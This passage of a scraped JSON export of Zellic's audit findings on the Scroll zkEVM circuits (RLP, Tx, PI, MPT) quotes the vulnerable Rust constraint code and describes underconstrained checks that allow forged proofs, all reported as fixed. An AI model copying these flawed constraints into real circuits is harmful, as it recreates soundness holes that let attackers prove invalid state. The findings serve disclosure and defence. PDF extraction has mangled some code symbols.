byte values. However, there is no check that the tag_length is no more than max_length. The tag_length may be over max_length \u2014 so inputs that do not fit the desired speci- fications may pass all the constraints in the circuit. We recommend to add a constraint that checks tag_length <) max_length. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.4 Missing range checks for the LtChip", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs, Tx Circuit, tx_circuit.rs Severity: Critical Category: Underconstrained Cir- : Critical cuits Likelihood: High The LtChip itself does not constrain that the diff columns are within the byte range and delegates this check to the circuits using this chip. ///)) Config for the Lt chip. #)derive(Clone, Copy, Debug)] pub struct LtConfig { ///)) Denotes the lt outcome. If lhs < rhs then lt =) 1, otherwise lt =) 0. pub lt: Column, ///)) Denotes the bytes representation of the difference between lhs and rhs. ///)) Note that the range of each byte is not checked by this config. pub diff: [Column; N_BYTES], ///)) Denotes the range within which both lhs and rhs lie. pub range: F, } However, this is missing in the RLP circuits. For the ComparatorConfig, it is also important to check that the left hand side and the right hand side are all within the specified range. ///)) Tx id must be no greater than cum_num_txs tx_id_cmp_cum_num_txs: ComparatorConfig, Therefore, in the Tx Circuit, it should be checked that tx_id and cum_num_txs are within 16 bits. The missing range check on diff breaks the functionalities of the LtChip, so using LtC hip does not actually constrain the comparison properly. Scroll We recommend to add the needed range checks for safe usage of the comparison gadgets. This issue has been acknowledged by Scroll, and a fix was implemented in commit d0e7a07e. 
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.5 Missing check in the initialization on the state machine in RLP Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical In the RLP state machine initialization, the byte_idx is checked to be 1, and the tag is checked to be either TxType or BeginList. meta.create_gate(\u201dsm init\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let tag = tag_expr(meta); constrain_eq!(meta, cb, byte_idx, 1.expr()); cb.require_zero( \u201dtag =) TxType or tag =) BeginList\u201d, (tag.expr() - TxType.expr()) * (tag - BeginList.expr()), ); cb.gate(meta.query_fixed(q_first, Rotation:)cur())) }); There is a missing check that the initial state should be DecodeTagStart. There is also no check that the initial tx_id is 1. This missing check allows us to start the decoding with states like Bytes. This may potentially lead to allowing invalid RLP decodings. We recommend to implement a check that the initial state is DecodeTagStart and that the initial tx_id is 1. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.6 Transition to new RLP instance in the state machine is un- derconstrained in RLP Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical In the state machine, in the case where depth =) 1, state' !) End, and is_tag_end =) True, the machine regards this as the transition between two RLP instances. It then constrains that the next byte_idx is 1, next depth is 0, and next state is DecodeTagStart as well as that either tx_id' = tx_id + 1 or format' = format + 1. It also constrains the tag_next column of the current row to be either TxType or Begin List. cb.condition( meta.query_advice(transit_to_new_rlp_instance, Rotation:)cur()), |cb| { let tx_id = meta.query_advice(rlp_table.tx_id, Rotation:)cur()); let tx_id_next = meta.query_advice(rlp_table.tx_id, Rotation:)next()); let format = meta.query_advice(rlp_table.format, Rotation:)cur()); let format_next = meta.query_advice(rlp_table.format, Rotation:)next()); let tag_next = tag_next_expr(meta); /) state transition. update_state!(meta, cb, byte_idx, 1); update_state!(meta, cb, depth, 0); update_state!(meta, cb, state, DecodeTagStart); cb.require_zero( \u201d(tx_id' =) tx_id + 1) or (format' =) format + 1)\u201d, (tx_id_next - tx_id - 1.expr()) * (format_next - format Scroll - 1.expr()), ); cb.require_zero( \u201dtag =) TxType or tag =) BeginList\u201d, (tag_next.expr() - TxType.expr()) * (tag_next.expr() - BeginList.expr()), ); }, ); There are two issues. First, the constraint on (tx_id', format') is weak, as it allows cases like (tx_id', format') = (tx_id - 1, format + 1). The constraint on tag_next is also weak, as there are no constraints on the next offset\u2019s tag \u2014 it should constrain that tag' is either TxType or BeginList instead. This underconstraint may allow the same transaction to appear twice in the state ma- chine and the first tag for a new RLP instance to not be equal to TxType or BeginList. 
We recommend implementing proper checks for (tx_id', format') as well as tag' for the transition. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.7 Equality between tag_value and the final tag_value_acc not checked", "labels": [ "Zellic" ], "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Circuits Likelihood: High Severity: Critical Impact: Critical In the Bytes state in the state machine, the byte values are accumulated over a column tag_value_acc. The final value of this tag_value_acc is the actual tag_value, which should be stored in the table for other use. However, in the Bytes => DecodeTagStart case where tag_index = tag_length, there is no check that tag_value = tag_value_acc. // Bytes => DecodeTagStart cb.condition(tidx_eq_tlen, |cb| { // assertions emit_rlp_tag!(meta, cb, tag_expr(meta), false); // state transitions. update_state!(meta, cb, tag, tag_next_expr(meta)); update_state!(meta, cb, state, State::DecodeTagStart); constrain_unchanged_fields!(meta, cb; rlp_table.tx_id, rlp_table.format, depth); }); Since tag_value is never constrained, the value that actually ends up in the RlpFsmRlpTable is unconstrained. We recommend adding the check that tag_value is equal to tag_value_acc. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.8 Missing do_not_emit! constraints", "labels": [ "Zellic" ], "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Circuits Likelihood: High Severity: Critical Impact: Critical The do_not_emit! macro is used to force is_output = false. This is used in various places where the current row does not represent a full tag value. However, in the DecodeTagStart => LongList transition, this check is missing. meta.create_gate(\"state transition: DecodeTagStart => LongList\", |meta| { let mut cb = BaseConstraintBuilder::default(); let (bv_gt_0xf8, bv_eq_0xf8) = byte_value_gte_0xf8.expr(meta, None); let cond = and::expr([ sum::expr([bv_gt_0xf8, bv_eq_0xf8]), not::expr(is_tag_end_expr(meta)), ]); cb.condition(cond.expr(), |cb| { // assertions. constrain_eq!(meta, cb, is_tag_begin, true); // state transitions update_state!(meta, cb, tag_length, byte_value_expr(meta) - 0xf7.expr()); update_state!(meta, cb, tag_idx, 1); update_state!(meta, cb, tag_value_acc, byte_value_next_expr(meta)); update_state!(meta, cb, state, State::LongList); constrain_unchanged_fields!(meta, cb; rlp_table.tx_id, rlp_table.format, tag, tag_next); }); cb.gate(and::expr([ meta.query_fixed(q_enabled, Rotation::cur()), is_decode_tag_start(meta), ])) }); In this case, the is_output is not constrained to be false, so the RlpFsmRlpTable may have invalid rows with is_output turned on, even though it should be turned off. We recommend adding a do_not_emit! macro in this case as well. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878.
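As a hedged sketch (assuming do_not_emit! takes the same (meta, cb) arguments as at its other call sites in rlp_circuit_fsm.rs), the missing line would go inside the conditioned block: cb.condition(cond.expr(), |cb| { do_not_emit!(meta, cb); // force is_output == false for this non-emitting transition // ... existing assertions and state transitions }); mirroring the other transitions that do not represent a full tag value.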
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.9 The state machine is not constrained to end at End", + "labels": [ + "Zellic" + ], + "body": "Target: RLP Circuit, rlp_circuit_fsm.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: High : High There are no constraints that the state machine ends with the state End. The state machine at the final transaction does not necessarily have to move to the End state. This means that the checks for the Case 4 in the DecodeTagStart => Deco deTagStart case can be potentially skipped \u2014 which includes the RLC, gas cost, and byte_rev_idx checks. We recommend adding a fixed column q_last, implementing the assign logic, and adding the constraint that the state is End if q_last is enabled. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.10 Enum definition is inconsistent with the circuit layout", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, witness/tx.rs Category: Code Maturity Likelihood: N/A Severity: Informational : Informational The Tx Circuit layout is composed of the fixed part with the transaction-related values of fixed size, followed by the dynamic part with the transaction calldata, which is not of fixed size. The layout for the fixed part is shown in the witness/tx.rs file\u2019s table_as signments_fixed. Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)Nonce as u64)), /) 2 Value:)known(F:)zero()), Value:)known(F:)from(self.nonce)), Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)Gas as u64)), /) 4 Value:)known(F:)zero()), Value:)known(F:)from(self.gas)), Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)GasPrice as u64)), /) 3 Value:)known(F:)zero()), challenges .evm_word() .map(|challenge| rlc:)value(&self.gas_price.to_le_bytes(), challenge)), Value:)known(F:)from(self.id as u64)), Value:)known(F:)from(TxContextFieldTag:)CallerAddress as u64)), /) 5 Value:)known(F:)zero()), Value:)known(self.caller_address.to_scalar().unwrap()), [ ], [ ], [ ], [ ], ...)) Scroll The issue here is that the order of the enum TxContextFieldTag matches the layout order in the circuit, except for the case of TxContextFieldTag:)Gas and TxContextFiel dTag:)GasPrice. The usage of the enums as an offset in the circuit can be seen in the circuit logic, as shown below. meta.create_gate(\u201dis_padding_tx\u201d, |meta| { let is_tag_caller_addr = is_caller_addr(meta); let mut cb = BaseConstraintBuilder:)default(); /) the offset between CallerAddress and BlockNumber let offset = usize:)from(BlockNumber) - usize:)from(CallerAddress); /) if tag =) CallerAddress cb.condition(is_tag_caller_addr.expr(), |cb| { cb.require_equal( \u201dis_padding_tx = true if caller_address = 0\u201d, meta.query_advice(is_padding_tx, Rotation(offset as i32)), value_is_zero.expr(Rotation:)cur())(meta), ); }); cb.gate(meta.query_fixed(q_enable, Rotation:)cur())) }); Therefore, for code quality, it is recommended to keep consistency between the actual offsets in the circuit layout and the TxContextFieldTag enum. Swap the order of Gas and GasPrice in the layout or the enum so that it is consistent. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. 
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.11 The first row of each Tx in the calldata section is undercon- strained in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The Tx Circuit layout\u2019s latter part deals with the calldata of each transaction. It constrains is_final is boolean if is_final is false \u2013 index' = index + 1 and tx_id' = tx_id \u2013 calldata_gas_cost_acc' = calldata_gas_cost + (value' =) 0 ? 4 : 16) if is_final is true \u2013 tx_id' !) tx_id meta.create_gate(\u201dtx call data bytes\u201d, |meta| { let mut cb = BaseConstraintBuilder:)default(); let is_final_cur = meta.query_advice(is_final, Rotation:)cur()); cb.require_boolean(\u201dis_final is boolean\u201d, is_final_cur.clone()); /) checks for any row, except the final call data byte. cb.condition(not:)expr(is_final_cur.clone()), |cb| { cb.require_equal( \u201dindex:)next =) index:)cur + 1\u201d, meta.query_advice(tx_table.index, Rotation:)next()), meta.query_advice(tx_table.index, Rotation:)cur()) + 1.expr(), ); cb.require_equal( \u201dtx_id:)next =) tx_id:)cur\u201d, tx_id_unchanged.is_equal_expression.clone(), 1.expr(), ); Scroll let value_next_is_zero = value_is_zero.expr(Rotation:)next())(meta); let gas_cost_next = select:)expr(value_next_is_zero, 4.expr(), 16.expr()); /) call data gas cost accumulator check. cb.require_equal( \u201dcalldata_gas_cost_acc:)next =) calldata_gas_cost:)cur + gas_cost_next\u201d, meta.query_advice(calldata_gas_cost_acc, Rotation:)next()), meta.query_advice(calldata_gas_cost_acc, Rotation:)cur()) + gas_cost_next, ); }); /) on the final call data byte, tx_id must change. cb.condition(is_final_cur, |cb| { cb.require_zero( \u201dtx_id changes at is_final =) 1\u201d, tx_id_unchanged.is_equal_expression.clone(), ); }); cb.gate(and:)expr(vec![ meta.query_fixed(q_enable, Rotation:)cur()), meta.query_advice(is_calldata, Rotation:)cur()), not:)expr(tx_id_is_zero.expr(Rotation:)cur())(meta)), ])) }); The issue here is that there is no constraint for the first row of the new transaction. To be exact, there is no constraint that index = 0 and calldata_gas_cost_acc = (value =) 0 ? 4 : 16) for the first row of the transaction. The index and calldata_gas_cost can be maliciously changed for the first row, which may lead to the values in the mentioned columns to be incorrect. We recommend adding the necessary constraints for the first row. Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.12 The sv_address is not constrained to be equal throughout a single transaction", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The sv_address is intended to be the column representing the signer\u2019s address. The first constraint on this column is that it is equal to the caller address in the case where the address is nonzero and the transaction type is not L1Msg. Note that this is checked on the offset of CallerAddress. meta.create_gate( \u201dcaller address =) sv_address if it's not zero and tx_type !) 
L1Msg\", |meta| { let mut cb = BaseConstraintBuilder::default(); cb.condition(not::expr(value_is_zero.expr(Rotation::cur())(meta)), |cb| { cb.require_equal( \"caller address == sv_address\", meta.query_advice(tx_table.value, Rotation::cur()), meta.query_advice(sv_address, Rotation::cur()), ); }); cb.gate(and::expr([ meta.query_fixed(q_enable, Rotation::cur()), meta.query_advice(is_caller_address, Rotation::cur()), not::expr(meta.query_advice(is_l1_msg, Rotation::cur())), ])) }, ); The second constraint on this column is the lookup to the sig circuit. This shows that the sv_address is the recovered address from the ECDSA signature. Note that this is checked on the offset of ChainId. meta.lookup_any(\"Sig table lookup\", |meta| { let enabled = and::expr([ // use is_l1_msg_col instead of is_l1_msg(meta) because it has lower degree not::expr(meta.query_advice(is_l1_msg_col, Rotation::cur())), // lookup to sig table on the ChainID row because we have an indicator of degree 1 // for ChainID and ChainID is not far from (msg_hash_rlc, sig_v, ...) meta.query_advice(is_chain_id, Rotation::cur()), ]); let msg_hash_rlc = meta.query_advice(tx_table.value, Rotation(6)); let chain_id = meta.query_advice(tx_table.value, Rotation::cur()); let sig_v = meta.query_advice(tx_table.value, Rotation(1)); let sig_r = meta.query_advice(tx_table.value, Rotation(2)); let sig_s = meta.query_advice(tx_table.value, Rotation(3)); let sv_address = meta.query_advice(sv_address, Rotation::cur()); let v = is_eip155(meta) * (sig_v.expr() - 2.expr() * chain_id - 35.expr()) + is_pre_eip155(meta) * (sig_v.expr() - 27.expr()); let input_exprs = vec![ 1.expr(), // q_enable = true msg_hash_rlc, // msg_hash_rlc v, // sig_v sig_r, // sig_r sig_s, // sig_s sv_address, 1.expr(), // is_valid ]; // LookupTable::table_exprs is not used here since `is_valid` not used by evm circuit. let table_exprs = vec![ meta.query_fixed(sig_table.q_enable, Rotation::cur()), // msg_hash_rlc not needed to be looked up for tx circuit? meta.query_advice(sig_table.msg_hash_rlc, Rotation::cur()), meta.query_advice(sig_table.sig_v, Rotation::cur()), meta.query_advice(sig_table.sig_r_rlc, Rotation::cur()), meta.query_advice(sig_table.sig_s_rlc, Rotation::cur()), meta.query_advice(sig_table.recovered_addr, Rotation::cur()), meta.query_advice(sig_table.is_valid, Rotation::cur()), ]; input_exprs .into_iter() .zip(table_exprs.into_iter()) .map(|(input, table)| (input * enabled.expr(), table)) .collect() }); The offsets of the sv_address that are checked in the two constraints are different, and there are no constraints to enforce that these two sv_address values are equal. In other words, there are no constraints to check that the sv_address value is equal throughout the rows that represent the same transaction. An attacker may use different addresses for the caller address and the ECDSA signature\u2019s recovered address. Depending on the exact logic of the other circuits, this could lead to arbitrary contract calls without proper ECDSA signatures. We recommend adding the check that sv_address is equal throughout the rows of the same transaction. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2565e254.
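For illustration, a minimal sketch of the recommended equality constraint (the gate name is ours; q_enable, sv_address, and the tx_id_unchanged gadget are the columns and helpers already used above): meta.create_gate(\"sv_address is constant within a tx\", |meta| { let mut cb = BaseConstraintBuilder::default(); cb.require_equal( \"sv_address::next == sv_address::cur\", meta.query_advice(sv_address, Rotation::next()), meta.query_advice(sv_address, Rotation::cur()), ); cb.gate(and::expr([ meta.query_fixed(q_enable, Rotation::cur()), tx_id_unchanged.is_equal_expression.clone(), // only within the same transaction ])) }); With this constraint in place, the value checked at the CallerAddress offset and the value looked up at the ChainId offset are forced to coincide.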
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.13 Block number constraints are incorrect in PI circuit", + "labels": [ + "Zellic" + ], + "body": "Target: PI Circuit, pi_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: High : High The block table is composed of a fixed column tag and advice columns index and value. ///)) Table with Block header fields #)derive(Clone, Debug)] pub struct BlockTable { ///)) Tag pub tag: Column, ///)) Index pub index: Column, ///)) Value pub value: Column, } Here, the index column is the block number corresponding to the row. The assign- ments for this table are shown in witness/block.rs. [ vec![ [ ], [ u64)), ], [ Value:)known(F:)from(BlockContextFieldTag:)Coinbase as u64)), Value:)known(current_block_number), Value:)known(self.coinbase.to_scalar().unwrap()), Value:)known(F:)from(BlockContextFieldTag:)Timestamp as Value:)known(current_block_number), Value:)known(self.timestamp.to_scalar().unwrap()), Value:)known(F:)from(BlockContextFieldTag:)Number as u64)), Scroll Value:)known(current_block_number), Value:)known(current_block_number), Value:)known(F:)from(BlockContextFieldTag:)Difficulty as ], [ u64)), Value:)known(current_block_number), randomness.map(|rand| rlc:)value(&self.difficulty.to_le_bytes(), rand)), ], [ ], [ Value:)known(F:)from(BlockContextFieldTag:)GasLimit as u64)), Value:)known(current_block_number), Value:)known(F:)from(self.gas_limit)), Value:)known(F:)from(BlockContextFieldTag:)BaseFee as u64)), Value:)known(current_block_number), randomness .map(|randomness| rlc:)value(&self.base_fee.to_le_bytes(), randomness)), ], [ ], [ ], [ u64)), ], ], Value:)known(F:)from(BlockContextFieldTag:)ChainId as u64)), Value:)known(current_block_number), Value:)known(F:)from(self.chain_id)), Value:)known(F:)from(BlockContextFieldTag:)NumTxs as u64)), Value:)known(current_block_number), Value:)known(F:)from(num_txs as u64)), Value:)known(F:)from(BlockContextFieldTag:)CumNumTxs as Value:)known(current_block_number), Value:)known(F:)from(cum_num_txs as u64)), self.block_hash_assignments(randomness), Scroll ] To constrain the block number, two checks are needed. The index values for these rows are equal. The index value is equal to the value column\u2019s value in the BlockContextFieldT ag:)Number row. However, this is incorrectly done. for (row, tag) in block_ctx .table_assignments(num_txs, cum_num_txs, challenges) .into_iter() .zip(tag.iter()) { region.assign_fixed( |) format!(\u201dblock table row {offset}\u201d), self.block_table.tag, offset, |) row[0], )?; /) index_cells of same block are equal to block_number. 
let mut index_cells = vec![]; let mut block_number_cell = None; for (column, value) in block_table_columns.iter().zip_eq(&row[1..]) { let cell = region.assign_advice( || format!(\"block table row {offset}\"), *column, offset, || *value, )?; if *tag == Number && *column == self.block_table.value { block_number_cell = Some(cell.clone()); } if *column == self.block_table.index { index_cells.push(cell.clone()); } if *column == self.block_table.value { block_value_cells.push(cell); } } for i in 0..(index_cells.len() - 1) { region.constrain_equal(index_cells[i].cell(), index_cells[i + 1].cell())?; } if *tag == Number { region.constrain_equal( block_number_cell.unwrap().cell(), index_cells[0].cell(), )?; } ... } Here, the index_cells array and block_number_cell are created for every single row, and the equality constraints between the cells are added. This means that the equality constraints between the index_cells are not actually properly enforced, as this array is created for every row, not for every block. The block table\u2019s index column may not be equal to the block number. We recommend taking the declaration of the index_cells array and the block_number_cell as well as the equality constraints outside the for loop of the table assignments. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.14 Missing constraint for the first tx_id in Tx Circuit", "labels": [ "Zellic" ], "body": "Target: Tx Circuit, rlp_circuit_fsm.rs Category: Underconstrained Circuits Likelihood: High Severity: High Impact: High For the tx_id column, the constraints are that if tag' = Nonce, then tx_id' = tx_id + 1, and if tag' != Nonce, then tx_id' = tx_id. While the transitions of the tx_id column are correct, there is no check that the first tx_id is equal to 1 in the Tx Circuit. meta.create_gate(\"tx_id transition\", |meta| { let mut cb = BaseConstraintBuilder::default(); // if tag_next == Nonce, then tx_id' = tx_id + 1 cb.condition(tag_bits.value_equals(Nonce, Rotation::next())(meta), |cb| { cb.require_equal( \"tx_id increments\", meta.query_advice(tx_table.tx_id, Rotation::next()), meta.query_advice(tx_table.tx_id, Rotation::cur()) + 1.expr(), ); }); // if tag_next != Nonce, then tx_id' = tx_id, tx_type' = tx_type cb.condition( not::expr(tag_bits.value_equals(Nonce, Rotation::next())(meta)), |cb| { cb.require_equal( \"tx_id does not change\", meta.query_advice(tx_table.tx_id, Rotation::next()), meta.query_advice(tx_table.tx_id, Rotation::cur()), ); cb.require_equal( \"tx_type does not change\", meta.query_advice(tx_type, Rotation::next()), meta.query_advice(tx_type, Rotation::cur()), ); }, ); cb.gate(and::expr([ meta.query_fixed(q_enable, Rotation::cur()), not::expr(meta.query_advice(is_calldata, Rotation::next())), ])) }); The first tx_id value is not guaranteed to be 1, so tx_id can start with an arbitrary value. We recommend adding the check for the first tx_id. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878.
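As a hedged sketch (q_first is an assumed fixed selector enabled only on the first Tx Table row): meta.create_gate(\"first tx_id is 1\", |meta| { let mut cb = BaseConstraintBuilder::default(); cb.require_equal( \"tx_id == 1 on the first row\", meta.query_advice(tx_table.tx_id, Rotation::cur()), 1.expr(), ); cb.gate(meta.query_fixed(q_first, Rotation::cur())) }); Together with the existing transition constraints, this pins the whole tx_id sequence to 1, 2, 3, and so on.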
Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.15 The CallDataRLC value in the fixed assignments is not vali- dated against the actual calldata in Tx Circuit", + "labels": [ + "Zellic" + ], + "body": "Target: Tx Circuit, tx_circuit.rs Category: Underconstrained Cir- cuits Likelihood: High Severity: Critical : Critical The fixed part of the Tx Circuit layout includes the row representing the CallDataRL C, which is the random linear combination of the calldata bytes. This value is also checked from the RLP circuit as well. The dynamic part of the Tx Circuit layout includes the raw calldata bytes for each transaction. The issue is that while there are checks for the CallDataGasCost and CallDataLength via lookups, there is no check the CallDataRLC value is actually equal to the RLC of the bytes in the calldata section. The actual calldata used can be different from the one in the RLP circuit or the fixed part of the Tx Circuit. We recommend adding the check of the consistency between the CallDataRLC and the calldata part of the Tx Circuit layout via a lookup argument. This issue has been acknowledged by Scroll, and a fix was implemented in commit 2e422878. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.16 The OneHot encoding gadget has incorrect constraints", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, gadgets/one_hot.rs Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The OneHot gadget has a previous helper function that returns the enum type repre- sented by the one-hot encoding at the previous row. impl OneHot { /) ...)) pub fn previous(&self) -> Query { T:)iter().enumerate().fold(Query:)zero(), |acc, (i, t)| { acc.clone() + Query:)from(u64:)try_from(i).unwrap()) * self .columns .get(&t) BinaryColumn:)current) .map_or_else(BinaryQuery:)zero, }) } /) ...)) } However, this implementation is incorrect as it queries the value of the binary columns representing the one-hot encoding at the current row. The OneHot gadget is used to maintain the validity of the transitions between various proof types in the MPT Circuit. For example, cb.condition(!is_start, |cb| { cb.assert_equal( \u201dproof type does not change\u201d, proof_type.current(), Scroll proof_type.previous(), ); this incorrect constraint can be used to generate invalid proofs in the MPT Circuit. We recommend fixing the incorrect constraint by using BinaryColumn:)previous to query the previous row. This issue has been acknowledged by Scroll, and a fix was implemented in commit 9bd18782. Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" + }, + { + "title": "1.17 The BinaryColumn gadget is missing boolean constraint check", + "labels": [ + "Zellic" + ], + "body": "Target: MPT Circuit, constraint_builder/binary_column.rs Severity: High Category: Underconstrained Cir- : High cuits Likelihood: High The BinaryColumn gadget is used by the OneHot encoding gadget to store information about the ProofType and SegmentType of each row. This gadget also assumes that the binary column exposed by the gadget only contains boolean (0/1) values. 
However, no such constraint exists in the BinaryColumn gadget to check this assumption: impl BinaryColumn { // ... pub fn configure( cs: &mut ConstraintSystem, _cb: &mut ConstraintBuilder, ) -> Self { let advice_column = cs.advice_column(); // TODO: constrain to be binary here... // cb.add_constraint() Self(advice_column) } } By assigning nonboolean values to the binary columns, one can generate inconsistent results returned by the queries to the OneHot gadget. This can lead to incorrect proof generation in the MPT Circuit, which makes use of these gadgets. We recommend adding a boolean constraint on the advice column in the BinaryColumn gadget. This issue has been acknowledged by Scroll, and a fix was implemented in commit 34af759e.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.18 Missing range check for address values in MPT Circuit", "labels": [ "Zellic" ], "body": "Target: MPT Circuit, gadgets/mpt_update.rs Category: Underconstrained Circuits Severity: Critical Impact: Critical Likelihood: High Description In the MPT Circuit, the account address is used to calculate the MPT key where account data is stored in the state trie: impl MptUpdateConfig { pub fn configure(/* ... */) { // ... cb.condition(is_start.clone().and(cb.every_row_selector()), |cb| { let [address, address_high, ..] = intermediate_values; let [old_hash_rlc, new_hash_rlc, ..] = second_phase_intermediate_values; let address_low: Query = (address.current() - address_high.current() * (1 << 32)) * (1 << 32) * (1 << 32) * (1 << 32); cb.poseidon_lookup( \"account mpt key = h(address_high, address_low)\", [address_high.current(), address_low, key.current()], poseidon, ); // ... }) } } There need to be range checks on the various values of address: The address needs to be range checked to be within 20 bytes or 160 bits. The address_high must be range checked to be within 16 bytes or 128 bits. The calculated value of address_low (before the multiplication by 2^96) must be range checked to be within 4 bytes or 32 bits. Without the necessary range checks, one can calculate multiple combinations of address_low and address_high for the same value of address. This results in multiple MPT keys for a single address, which leads to an invalid state trie. We recommend adding the appropriate range checks to the intermediate columns as mentioned above. This issue has been acknowledged by Scroll, and a fix was implemented in commit e4f5df31.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.19 Incorrect assertion for account hash traces in Proof::check", "labels": [ "Zellic" ], "body": "Target: MPT Circuit, types.rs Category: Coding Mistakes Likelihood: N/A Severity: Informational Impact: Informational The Proof::check function ensures that the account hash traces that are used as intermediate witnesses for the MPT circuit are generated correctly.
One of the assertions in this function contains a typo: impl Proof { fn check(&self) { // ... assert_eq!( hash( hash(Fr::one(), self.leafs[0].unwrap().key), self.leafs[0].unwrap().value_hash ), self.old_account_hash_traces[5][2], ); assert_eq!( hash( hash(Fr::one(), self.leafs[1].unwrap().key), self.leafs[1].unwrap().value_hash ), self.new_account_hash_traces[5][2], ); // ... } } If we look at account_hash_traces, where these traces are generated, we see that the left-hand side of the assertion is actually equal to the entry account_hash_traces[6][2]: fn account_hash_traces(address: Address, account: AccountData, storage_root: Fr) -> [[Fr; 3]; 7] { let account_key = account_key(address); let h5 = hash(Fr::one(), account_key); let poseidon_codehash = big_uint_to_fr(&account.poseidon_code_hash); let account_hash = hash(h4, poseidon_codehash); // ... account_hash_traces[5] = [Fr::one(), account_key, h5]; account_hash_traces[6] = [h5, account_hash, hash(h5, account_hash)]; } As this function is not used anywhere, there is no security impact. However, we recommend fixing this for code maturity as it may be used in tests in the future. Change the right-hand side of the assertion to the correct index. This issue has been acknowledged by Scroll, and a fix was implemented in commit 753d2f91.", "html_url": "https://github.com/Zellic/publications/blob/master/Scroll zkEVM - Part 2 - Audit Report.pdf" }, { "title": "1.20 Implementations of RlcLookup trait are not consistent", "labels": [ "Zellic" ], "body": "Target: MPT Circuit Category: Code Maturity Likelihood: Low Severity: Informational Impact: Informational The MPT Circuit uses the RlcLookup trait to perform lookups about the RLC values of various witnesses. This trait is defined in byte_representation.rs: pub trait RlcLookup { fn lookup(&self) -> [Query; 3]; } This lookup trait is implemented by two gadgets: ByteRepresentation and CanonicalRepresentation: impl RlcLookup for ByteRepresentationConfig { fn lookup(&self) -> [Query; 3] { [ self.value.current(), self.index.current(), self.rlc.current(), ] } } impl RlcLookup for CanonicalRepresentationConfig { fn lookup(&self) -> [Query; 3] { [ self.value.current(), self.rlc.current(), self.index.current(), ] } } While both of these gadgets implement the same lookup trait, they have a different order of columns. Not only that, but the definition of value is different \u2014 while value in the ByteRepresentationConfig is the value of the accumulated bytes so far, the value in the CanonicalRepresentationConfig is the value of the entire field element. This lookup trait is used in word_rlc.rs with an implicit assumption that the RlcLookup is implemented by the ByteRepresentationConfig. While there are no wrong lookups performed currently, there is a chance that future changes to the code may introduce security issues due to incorrect assumptions on the structure of the RlcLookup. We recommend introducing distinct traits for these two different lookups to remove the ambiguity and improve code maturity. This issue has been acknowledged by Scroll, and a fix was implemented in commit b5ea508b.
